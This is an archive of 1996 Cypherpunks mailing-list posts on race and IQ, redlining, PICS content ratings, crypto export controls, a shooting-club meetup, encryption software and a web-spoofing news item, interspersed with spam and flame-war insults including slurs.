MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"dthorn@gte.net"  "Dale Thorn" 12-DEC-1996 14:56:52.69

>Actually, there is not only good evidence for the environmental argument,
>but you can reason it out yourself if you give attention to some things
>that don't make it into most discussions on this topic.

	Yes, there are strong arguments for the environment being the
determining factor... there are also strong arguments (such as interracial
adoption still leaving blacks below the average IQ of adopted siblings)
for it being genetics. We won't be able to find out which is which until
we know what the genetic determinants of intelligence are, which will take
some time. (Using current techniques, several hundred years at the minimum...
but I'm not prepared to predict how good techniques will get). As I previously
stated, I don't believe it is any part genetic.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Date: Thu, 12 Dec 1996 03:11:11 -0800 (PST)
To: Dave Del Torto <pgp-mime@purpletape.cs.uchicago.edu>
Subject: No Subject
Message-ID: <Pine.LNX.3.91.961212160850.8387C-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain



Hey.. is there any CoderPunks Meetings somewhere in russia?

-X----- Fyodor --- fygrave@freenet.bishkek.su --------------------------X--
  "With heart and hand I pledge you while I load my gun again, you will
   never be fogotten or the enemy forgiven, my good comrade..."
                                               - Anton Szandor LaVay
-X--http://www.freenet.bishkek.su/fygrave.html---tel:(3312)474465-------X--
-X--http://www.geocities.com/SunsetStrip/Alley/8302-mirror-at-geocities-X--
             pgp is awaliable from pgp-key-servers :
pub  2048/3D22AF59 1980/03/24 Fyodor Yarochkin <fygrave@freeenet.bishkek.su>
   Key fingerprint = 1F 38 55 07 98 F9 42 7D  57 73 74 FA 9C 5B 29 FB

"As Above, So Below.
The Macrocosm, the Microcosm.
The Entire Universe is Contained
In The Human Creature"
        To The Fallen Angels




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 12 Dec 1996 13:36:08 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Redlining
Message-ID: <01ICXGBPMPJ4AEL7YC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ichudov@algebra.com" 11-DEC-1996 19:45:12.83

>A good question. It is based on the theory that every person has a
>"utility" function in their mind. This function determines the "worth"
>of money and worthiness of risk. 

>If that function as a function of income is strictly concave

	Except in the case of a consumer for whom the lower end is essentially
no different than 0 - e.g., a minimum amount for survival - having a concave
utility function for money (as opposed to less-convertible goods/services)
is irrational. While I am in favor of allowing people to be irrational if they
so desire, I am not in favor of governmental rules (e.g., coercive rules) being
determined by irrationality. See my comments on emotion to Matt M.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 12 Dec 1996 13:31:14 -0800 (PST)
To: mjmiski@execpc.com
Subject: Re: Redlining
Message-ID: <01ICXGIQSR8MAEL7YC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 12-DEC-1996 11:32:36.79

>Just wanted to clear up that my reference to student loans was not meant to
>start a discussion of the granting of _those_ loans.  It was meant to spark
>a discussion of the lending to those borrowers *after* they graduate.  As a
>group, their default rate is generally high.  And yet, as a group, the
>extension of credit to these people is not systematically denied (as in
>redlining).

>I take responsibility for the thread being confused as I believe my first
>mention of it was unclear.  mea culpa.  

	I see... that explains your apparantly nonsensical answer that the
guarantees on student loans don't make any difference. Quite alright; we all
make mistakes.
	I would like to suggest that the essential problem in determining
loans to those who have just graduated is that of headaches in gathering
sufficient information; namely, the cost of finding out "is this a good
school" and "how good are this person's prospects" are sufficiently high so as
to make up for the default rates. As previously mentioned by Dale Thorn,
the inclusion in this figure of various trade schools is also a (related)
problem, one that Clinton's proposal of student loans for 2 years of
college for _everyone_ would make worse.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Thu, 12 Dec 1996 16:51:17 -0800 (PST)
To: ca3sal@isis.sunderland.ac.uk (Stephen.George.Allport)
Subject: Re: Neural Nets
Message-ID: <3.0.32.19961212164107.006c0ea0@best.com>
MIME-Version: 1.0
Content-Type: text/plain


This comes up once in a while --- it appears an inappropriate approach,
they say,
since the solution space for the problem consists of exactly one spike, in
the vast sea of 
all possible solutions ... there is no smooth contour over which to
minimize the net's 
error function, and finding the one spike which is the correct result is no
more efficient
in such a case than any other exhaustive search.

This argument would break down if there were detectable biases in the
crypto algorithm
that you could exploit.  But then whether a nn would be the tool of choice
in such a case
may be uncertain.


At 01:00 PM 12/12/96 GMT, you wrote:
>Hi Folkd
>
>Just sat through a lecture on an itroduction to  Neural Nets. 
>
>Thought. Does anybody know of any tools that use Neural Nets to break
>ciphers?
>
>Cheers
>
>Ste
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 12 Dec 1996 17:37:39 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Why PICS is the wrong approach
In-Reply-To: <32B043D8.4AC6@gte.net>
Message-ID: <199612130137.RAA10448@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>If Firefly is an example of what PICS is or could become, the hell with
>PICS.  Firefly encourages and rewards group behavior and suppresses
>individuality.  Firefly would reward the discussion of the latest album
>by a Columbia or Capitol artist, and discourage discussion of material
>from independent (real independent) labels.  I know because I've been
>there and spent quite a bit of time trying to get a rating.
>

this is absolutely ridiculous. the rating system is designed to
be incredibly individualized. it uses sophisticated statistical
techniques to find the correlations in your UNIQUE ratings given
over a set of items with other people's ratings, and weighs
future ratings based on these correlations. it may be even
dealing with anti-correlations. in fact what you have, in effect,
is a system with *no* hardwired ratings. the ratings space is
different for *every*single*person* who uses the service.

"you know"? get a clue, please. these systems are not at all like
the record rating systems you get in stores. I sympathize with
your plight however and agree that the record labeling system
is a lame way to go about it. all the more reason to support things
like firefly and grouplens (another interesting system that may
have inspired firefly, do a yahoo search to find it). superior
rating systems will begin to flourish instead of inferior ones...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santa Claus <infoserver@reply.net>
Date: Thu, 12 Dec 1996 15:15:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Merry Christmas, HipXmas-SantaSpam
Message-ID: <199612122316.SAA14706@reply.net>
MIME-Version: 1.0
Content-Type: text/plain


An Xmas greeting from f_ck@hotmail.com ..... 


                  **
                 ****
                ******
               ********
              **********
             ************
            **************
           ****************
          ******************
         ********************
        **********************
              S A N T A        
                * * *           
          N O R T H  P O L E      
                |  |              
               \____/              


Wherever you go, whatever you do, 
Remember that Santa is always with you. 
I live in your heart, I dance in your soul, 
I show you what love is, and good things to know. 

The Spirit of Christmas spreads all through the land, 
With joy and the giving of gifts you should have. 
But gifts are just one thing to give and to get -- 
We wish you much more, far more than that. 

My elves send you pride in whatever you do, 
My reindeer give strength on days you feel blue, 
My wife, Mrs. Claus, grants wisdom and grace, 
Belief in yourself and all you create. 

And me, what do I give? Is there much more? 
Plenty and plenty you won't find in stores. 
I give you the knowledge that you can do more 
Than you ever knew -- of that be quite sure. 

My sleigh's packed with toys, my list sweeps the floor, 
A cup of hot cocoa and I'm out the door. 
Just gaze high in the sky where Peace always soars, 
And you live in my heart as I live in yours. 

               *            
              * *           
             * * *          
           M e r r y        
       C h r i s t m a s    
              * *           
      S a n t a  C l a u s  


---------
This santa poem was sent to you from the person with the
following e-mail address: f_ck@hotmail.com

If you would like to return the greeting then stop by the
ReplyNet Santa Site at www.reply.net/santa.html
Your e-mail address is NOT being collected or stored.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santa Claus <infoserver@reply.net>
Date: Thu, 12 Dec 1996 15:36:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Merry Christmas, CypherWimps-love-SantaSpam
Message-ID: <199612122337.SAA15242@reply.net>
MIME-Version: 1.0
Content-Type: text/plain


An Xmas greeting from cypherwimps@post1.com ..... 


                  **
                 ****
                ******
               ********
              **********
             ************
            **************
           ****************
          ******************
         ********************
        **********************
              S A N T A        
                * * *           
          N O R T H  P O L E      
                |  |              
               \____/              


Wherever you go, whatever you do, 
Remember that Santa is always with you. 
I live in your heart, I dance in your soul, 
I show you what love is, and good things to know. 

The Spirit of Christmas spreads all through the land, 
With joy and the giving of gifts you should have. 
But gifts are just one thing to give and to get -- 
We wish you much more, far more than that. 

My elves send you pride in whatever you do, 
My reindeer give strength on days you feel blue, 
My wife, Mrs. Claus, grants wisdom and grace, 
Belief in yourself and all you create. 

And me, what do I give? Is there much more? 
Plenty and plenty you won't find in stores. 
I give you the knowledge that you can do more 
Than you ever knew -- of that be quite sure. 

My sleigh's packed with toys, my list sweeps the floor, 
A cup of hot cocoa and I'm out the door. 
Just gaze high in the sky where Peace always soars, 
And you live in my heart as I live in yours. 

               *            
              * *           
             * * *          
           M e r r y        
       C h r i s t m a s    
              * *           
      S a n t a  C l a u s  


---------
This santa poem was sent to you from the person with the
following e-mail address: cypherwimps@post1.com

If you would like to return the greeting then stop by the
ReplyNet Santa Site at www.reply.net/santa.html
Your e-mail address is NOT being collected or stored.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santa Claus <infoserver@reply.net>
Date: Thu, 12 Dec 1996 15:37:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Merry Christmas, CypherWimps-hate-SantaSpam
Message-ID: <199612122337.SAA15275@reply.net>
MIME-Version: 1.0
Content-Type: text/plain


An Xmas greeting from cypherwimps@post1.com ..... 


                  **
                 ****
                ******
               ********
              **********
             ************
            **************
           ****************
          ******************
         ********************
        **********************
              S A N T A        
                * * *           
          N O R T H  P O L E      
                |  |              
               \____/              


Wherever you go, whatever you do, 
Remember that Santa is always with you. 
I live in your heart, I dance in your soul, 
I show you what love is, and good things to know. 

The Spirit of Christmas spreads all through the land, 
With joy and the giving of gifts you should have. 
But gifts are just one thing to give and to get -- 
We wish you much more, far more than that. 

My elves send you pride in whatever you do, 
My reindeer give strength on days you feel blue, 
My wife, Mrs. Claus, grants wisdom and grace, 
Belief in yourself and all you create. 

And me, what do I give? Is there much more? 
Plenty and plenty you won't find in stores. 
I give you the knowledge that you can do more 
Than you ever knew -- of that be quite sure. 

My sleigh's packed with toys, my list sweeps the floor, 
A cup of hot cocoa and I'm out the door. 
Just gaze high in the sky where Peace always soars, 
And you live in my heart as I live in yours. 

               *            
              * *           
             * * *          
           M e r r y        
       C h r i s t m a s    
              * *           
      S a n t a  C l a u s  


---------
This santa poem was sent to you from the person with the
following e-mail address: cypherwimps@post1.com

If you would like to return the greeting then stop by the
ReplyNet Santa Site at www.reply.net/santa.html
Your e-mail address is NOT being collected or stored.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santa Claus <infoserver@reply.net>
Date: Thu, 12 Dec 1996 15:37:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Merry Christmas, CypherWimps-want-SantaSpam
Message-ID: <199612122337.SAA15289@reply.net>
MIME-Version: 1.0
Content-Type: text/plain


An Xmas greeting from cypherwimps@post1.com ..... 


                  **
                 ****
                ******
               ********
              **********
             ************
            **************
           ****************
          ******************
         ********************
        **********************
              S A N T A        
                * * *           
          N O R T H  P O L E      
                |  |              
               \____/              


Wherever you go, whatever you do, 
Remember that Santa is always with you. 
I live in your heart, I dance in your soul, 
I show you what love is, and good things to know. 

The Spirit of Christmas spreads all through the land, 
With joy and the giving of gifts you should have. 
But gifts are just one thing to give and to get -- 
We wish you much more, far more than that. 

My elves send you pride in whatever you do, 
My reindeer give strength on days you feel blue, 
My wife, Mrs. Claus, grants wisdom and grace, 
Belief in yourself and all you create. 

And me, what do I give? Is there much more? 
Plenty and plenty you won't find in stores. 
I give you the knowledge that you can do more 
Than you ever knew -- of that be quite sure. 

My sleigh's packed with toys, my list sweeps the floor, 
A cup of hot cocoa and I'm out the door. 
Just gaze high in the sky where Peace always soars, 
And you live in my heart as I live in yours. 

               *            
              * *           
             * * *          
           M e r r y        
       C h r i s t m a s    
              * *           
      S a n t a  C l a u s  


---------
This santa poem was sent to you from the person with the
following e-mail address: cypherwimps@post1.com

If you would like to return the greeting then stop by the
ReplyNet Santa Site at www.reply.net/santa.html
Your e-mail address is NOT being collected or stored.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 12 Dec 1996 16:47:38 -0800 (PST)
To: shamrock@netcom.com (Lucky Green)
Subject: Re: New export controls to include code signing applications
In-Reply-To: <3.0.32.19961211163934.006a08a0@netcom14.netcom.com>
Message-ID: <199612130106.TAA02487@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky wrote:

> [Listing specific software prohibited from export]
> "c.2. "Software" to certify "software" controlled by 5D002.c.1; "
   ^^^^
      Anyone else see the coincidence here?

      Life can get real strange.
  
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 12 Dec 1996 19:08:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Meeting] Cypherpunks Shooting Club
Message-ID: <3.0.32.19961212190918.006931e0@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Fellow firearms friends,

The Cypherpunks Shooting Club will meet this Sunday, 12/14/96, the day
after the monthly Bay Area Cypherpunks Meeting. From now on, we will meet
once a month, on the day after the monthly meeting.

Anyone interested in firearms is encouraged to attend. You don't need to
own a gun and you don't need to know how to operate one. Of course, if you
do, all the better. Various firearms (rifles, handguns, shotguns) will be
available. 

We will gladly provide safety and operations instructions.

When: 2:00 pm 12/14/96

Where: United Sportsmen Rifle Range, Ebora Road, Concord, CA, 510-676-1963

How to get there:

o From SF, Oakland, the North Bay: [Cross the bridge to the East Bay if
applicable].

Take I580 to Highway 24 to WALNUT CREEK. In Walnut Creek, the 24 merges
with I680. Follow I680 NORTH. Past Concord, take Highway 4 EAST. Drive for
a few miles. Note the nuclear weapons depot on the right. Just past the
depot, exit on WILLOW PASS ROAD. Make a LEFT on Willow Pass Road. Cross
underneath the highway. At the end of the road, make a RIGHT. Drive 3/4 of
a mile. United Sportsmen is the second dirt road on the LEFT. If you
reached some homes, you went too far.

o From the Peninsula: Take San Mateo Bridge to the East Bay. Go NORTH for a
few miles. Take the freeway EAST (number?) to LIVERMORE. At the PLEASANTON
interchange, take I680 NORTH. Follow the instructions above.

Why we are meeting in the East Bay: Several regular participants are
already meeting Sunday morning in Berkeley.

What if it rains: The outdoor range is an all weather range. We will meet
unless it really pours.

Cost: $5 range fee + ammunition. $15 total should suffice for a first timer.

What to bring:
o Eye protection [mandatory]. Prescription and sunglasses meet the
requirements, though I would advise you to use something safer. Chemistry
lab glasses work great.

o Ear protection [mandatory]. If needed, you can buy some foam type ear
protection at the range. It costs less than $5.

o Any firearm you might want to bring.

Please RSVP if you plan to attend.

See you Sunday,


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 12 Dec 1996 17:23:19 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Java DES breaker?
In-Reply-To: <cm7syD148w165w@bwalk.dm.com>
Message-ID: <199612130142.TAA02633@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Vulis wrote:
> "Mark M." <markm@voicenet.com> writes:
> > compiles Java to a stand-alone executable.  Details at
> > http://webhackers.cygnus.com/webhackers/projects/java.html .
> It would be very foolish to touch any shit that comes out of Cygnus.

     Why? (specifically, I am about to try using a GCC port to WinNT, and
I would like to know _why_ you think their work is shit).



Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 12 Dec 1996 17:26:56 -0800 (PST)
To: nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node)
Subject: Re: New export controls to include code signing applications
In-Reply-To: <199612120712.XAA05665@cypherpunks.ca>
Message-ID: <199612130146.TAA02651@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



Milou wrote:
> However, all they will succeed in doing is greatly harming the U.S.
> computer security business.  A few decades from now people will look
> back on these policies in disbelief.

    It didn't take that long. I am looking on in disbelief right now. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 12 Dec 1996 17:29:01 -0800 (PST)
To: attila@primenet.com
Subject: Re: Lucky's Official Prediction (raising the ante)
In-Reply-To: <199612120903.CAA25493@infowest.com>
Message-ID: <199612130148.TAA02667@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


The Hun said:
>         within two years, Bubba and friends will successfully both:
>         a)  destroy the Bill of Rights

     He can't. You can't destroy that which is already rubble. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 12 Dec 1996 17:37:53 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Redlining
In-Reply-To: <32B03E27.5EF9@gte.net>
Message-ID: <199612130156.TAA02703@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Thorn wrote:
> > P.S. Please note that we cannot yet tell if the racial differences in
> > IQ are environmental or a mixture of environmental and genetic; I
> > believe they are purely environmental, but there is about as much
> > evidence for this belief as there is for God's existence (something
> > I also believe in).
> Example:  Environment has a profound effect on a person's mind (outlook,
> perceptions, attitudes, moods, etc.), and thereby has a significant, if
> indirect effect on that person's hormone production (quantity, balance).
> Those hormone productions have more effect on the body and brain long-
> term than any other influence I can think of.

     I bet the problem is even simpler than that. 

     Look at studies that correlate nutrition with grades/learning.

     Look at "inner city" dietary habits of 3 to 5 year old children (and
any other "under performing" group). 

     I'd bet $20 on the correlation.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 12 Dec 1996 17:51:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: take me off the list
In-Reply-To: <850411279.523996.0@fatmans.demon.co.uk>
Message-ID: <kVouyD151w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul Bradley must be a very sick young man. He can't control himself.
He feels compelled to post obscenities to this mailing list.

paul@fatmans.demon.co.uk writes:

> Why did you not follow the instructions I have sent to you no less
> than 5 times? - they follow, for fucks sake do as they say this
> time.

Has anyone ever seen an article by Paul without the word "fuck" in it?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Thu, 12 Dec 1996 19:07:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Elliptic curves
In-Reply-To: <850408570.510393.0@bexcol.demon.co.uk>
Message-ID: <199612130307.UAA13495@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Admin@bexcol.demon.co.uk writes:

> You are all a bunch of faggots. Faggot cannot be allowed on usenet as 
> dictated by the great dr. Grubor.
> 
> Fuck you all.

1. Cypherpunks is not on usenet.

2. Faggots created and run Usenet, and there's nothing a pathetic,
   powerless little boy like you can do about it.

3. I enjoy your pathetic little displays of despair about not having
   any control over usenet.  Please keep whining to the mailing lists
   to remind us all of what a pitiful little loser you are.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 12 Dec 1996 18:00:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Java DES breaker?
Message-ID: <NmquyD154w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


More than one person writes:

> Vulis wrote:
> > "Mark M." <markm@voicenet.com> writes:
> > > compiles Java to a stand-alone executable.  Details at
> > > http://webhackers.cygnus.com/webhackers/projects/java.html .
> > It would be very foolish to touch any shit that comes out of Cygnus.
>
>      Why? (specifically, I am about to try using a GCC port to WinNT, and
> I would like to know _why_ you think their work is shit).

First, because it's King John "Lackbrain" Gilmore's company. :-)

Second, because they hire unqualified people (rather, people whose
qualifications have nothing to do with the job) and they've already
fucked up every project they've ever touched.

Third, because they steal from the people who originally developed the
free software by charging money for the non-existent "support".

I'm quite happy with MS VC++ for NT. I doubt that Cygnus can do a good job
porting gcc to NT. People much better than the assholes at Cygnus have not
done a great job porting gcc to OS/2. If I want gcc, I just run it on the
Linux box, or a Sun box.

Fuck Cygnus.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KDBriggs1@aol.com
Date: Thu, 12 Dec 1996 18:08:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Puffer 2.1
Message-ID: <961212210731_2085045806@emout03.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Puffer 2.1 is now available from http://execpc.com/~kbriggs

Puffer is a shareware file and e-mail encryption program
for Windows in 16-bit and 32-bit editions.  Features 40-bit
RC4 encryption in exportable shareware and international
versions plus 160-bit Blowfish encryption in US/Canada
registered version.  A multi-pass data wipe feature is also
available for files, file slack, and empty disk space.

New for version 2.1: program settings saved in INI file,
selectable decryption directory, improved ASCII PUF split
option, fixed Windows 95 cache flush bug, other minor
bug fixes, new uninstall utility.

A patch program is also available from the web site for
registered users to self-upgrade from version 2.0.

Kent Briggs
Briggs Softworks, http://execpc.com/~kbriggs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: msprague@ridgecrest.ca.us
Date: Thu, 12 Dec 1996 21:15:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: NEWS: Web Security Hole Revealed (opportunity?)
Message-ID: <199612130514.VAA04501@owens.ridgecrest.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


>At 11:14 PM 12/11/96 -0500, you wrote:
>>X-Sender: okeefe@olympus.net
>>Mime-Version: 1.0
>>Date: Wed, 11 Dec 1996 19:32:32 -0800
>>To: N E W S   R E L E A S E  <IPS@olympus.net>
>>From: "Steve O'Keefe" <IPS@olympus.net>
>>Subject: NEWS: Web Security Hole Revealed
>>
>>BREAKING NEWS
>>For Release Thursday, December 12, 1996
>>
>>MAJOR  WEB  SECURITY  FLAW  REVEALED
>>
>>(New York) -- Edward Felten, head of Princeton University's
>>Safe Internet Programming Team (SIP), today revealed a
>>major security flaw in the Internet's World Wide Web.
>>Called "web spoofing," the breach allows any Internet
>>server to place itself between a user and the rest of the
>>web. In that middle position, the server may observe, steal
>>and alter any information passing between the unfortunate
>>browser and the web.

(deletia)


Wait a minuite;  This sounds like an opportunity!
I see a possibility for a machine confugured to tx/rx PGP encrypted packets
to re-broadcast them with the machines IP.
This would become an anonymous ISP





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Thu, 12 Dec 1996 18:17:22 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why PICS is the wrong approach
Message-ID: <3.0.32.19961212205225.00a108c0@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 07:58 PM 12/11/96 -0500, you wrote:

  > PICS is the wrong approach becuase it oversimplifies the ratings of
  > content, because it places the ratings made by the author in the payload
  > itself, and because third-party ratings systems are cut out of the loop
  > (effectively).

	Perhaps I don't understand what you are saying. I just want to ensure that
you understand that the PICS labels can be distributed in multiple ways.
(document, server, label bureau.) I suspect you do, and what you are
objecting to is that documnet-embedded labels will have a greater weight
than those distributed by third parties:

  > agencies, and laws. But once set, the "binding" has been made. Later
  > reviews or reviews by other entities cannot affect the binding, at least
  > not for this distributed instance.

And consequently authors have a greater responsibility/liability than you
would like:

  > More importantly, the "payload" does not carry some particular set of
  > fairly-arbitrary PICS evluations. Binding by the censors instead of by the
  > originator, which is as it should be.

In which case, I disagree. I think accurate, consistent, "objective" (I
know this is an argument on the other thread, I think one can get
relatively "objective ratings" see my RSAC case study for a break down on
the qualities of rating systems on my ecommerce page (home page below))
well branded and reputable agents will have a greater weight, and will have
a market motivation for accuracy exceeding regulatory pressure. (Plus,
there is nothing preventing thresh-hold tolerances for use with multiple
ratings.)

_______________________
Regards,          Restlessness and discontent are the first necessities 
                  of progress. -Thomas A. Edison
Joseph Reagle     http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu    E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 12 Dec 1996 19:00:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: In Defense of Anecdotal Evidence
In-Reply-To: <199612122212.OAA27964@mailmasher.com>
Message-ID: <NisuyD158w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@huge.cajones.com (Huge Cajones Remailer) writes:
> Social statistics are a black art.  There was a study awhile back
> which claimed gun ownership reduced violent crime.  That is a
> surprising result. ..

What's surprising about it??

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 12 Dec 1996 21:56:21 -0800 (PST)
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Redlining
In-Reply-To: <01ICXFPL6XZOAEL7YC@mbcl.rutgers.edu>
Message-ID: <32B0EF3D.F5E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith wrote:
> From:   IN%"dthorn@gte.net"  "Dale Thorn" 12-DEC-1996 14:56:52.69
> >Actually, there is not only good evidence for the environmental argument,
> >but you can reason it out yourself if you give attention to some things
> >that don't make it into most discussions on this topic.

> Yes, there are strong arguments for the environment being the determining
> factor. there are also strong arguments (such as interracial adoption still
> leaving blacks below the average IQ of adopted siblings) for it being genetics.

It is possible to understand intelligence as "pattern matching" skills,
without having to have attendant math and statistics to define it more
precisely or clinically. This understanding (if you have it) is the key
to knowing that Black persons do *not* have less IQ than White persons,
regardless of the standardized tests.  Something I know about, as I've
scored in the top 1/1000 of one percent, etc.

> We won't be able to find out which is which until we know what the genetic
> determinants of intelligence are, which will take some time. (Using current
> techniques, several hundred years at the minimum... but I'm not prepared
> to predict how good techniques will get). As I previously stated, I don't
> believe it is any part genetic.

Nice that you have good intuition on this point, however, the big question
in your paragraph is not wherefore the genetic determinant, rather, it is
the understanding of intelligence in its overall context, which I dare say
most researchers in that field are probably ill-equipped to grasp.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 12 Dec 1996 20:26:52 -0800 (PST)
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: In Defense of Anecdotal Evidence
In-Reply-To: <199612122212.OAA27964@mailmasher.com>
Message-ID: <199612130424.WAA13835@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Huge Cajones Remailer wrote:
> Statistics are a useful tool, but they have their problems.  Their
> accuracy is often in doubt.  Most scientific data comes with an error
> analysis so you can tell what the figure means.  For some reason
> statisticians never do this so we cannot tell whether their numbers
> are accurate to within 0.1%, 1.0%, 10%, or even worse.
> 
> There are many other problems.  For instance, users of statistics
> assume they have a random sample, even in cases where that is far from
> clear.

Wrong statistics is usually obtained by idiots who do not know
what statistics is about. 

Social scientists and feminist studies are a frequent example of such
unfortunate situation.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 12 Dec 1996 19:22:15 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Java DES breaker?
In-Reply-To: <6uBsyD129w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961212221038.27578A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> I happen to have a Sparc 20 box and a Linux box and a SCO box, and ActiveX
> won't work on any of those. I also work with a bunch of other equipment
> that's much faster than a PC, but doesn't run browsers. (Most of it is not
> connected to the 'net for security reasons, but that's besides the point.)

Right, and Active X, if those machies were on the web, would not be 
supported.
 
> If Bill's client is sure to run the platforms that MS IE runs on, then this is
> not a consideration.

Correct, however there is one thing you have forgotten... (next paragraph)

> Interpreted FORTH bytestream (which is what Java is) may be "doing quite well"
> when drawing GUI gizmos and widgets, but it can't get anywhere near the
